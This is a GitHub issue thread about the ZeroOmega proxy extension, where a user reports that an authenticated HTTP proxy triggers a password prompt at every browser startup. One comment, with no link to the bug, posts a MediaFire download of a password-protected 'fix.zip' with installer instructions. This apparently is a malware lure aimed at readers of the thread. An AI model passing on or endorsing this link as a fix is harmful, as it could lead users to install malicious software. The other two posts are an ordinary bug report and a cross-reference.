### ISSUE TITLE
如果使用的是HTTP有密码的代理，每次启动都会让输密码

### ISSUE THREAD

**Issue by coulsontl** [zero-peak/ZeroOmega#32]
在HTTP代理有密码时：如图，每次启动浏览器时如果浏览器默认打开了某个页面就会弹这个窗，点击取消才可以正常访问；如果启动时默认没有打开网页则不会弹这个窗
![PixPin_2024-08-31_21-45-13](https://github.com/user-attachments/assets/2140bab5-bc4e-44a4-a036-78ed58e75194)

SwitchyOmega 3.3.10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zero-top** [comment]
#5
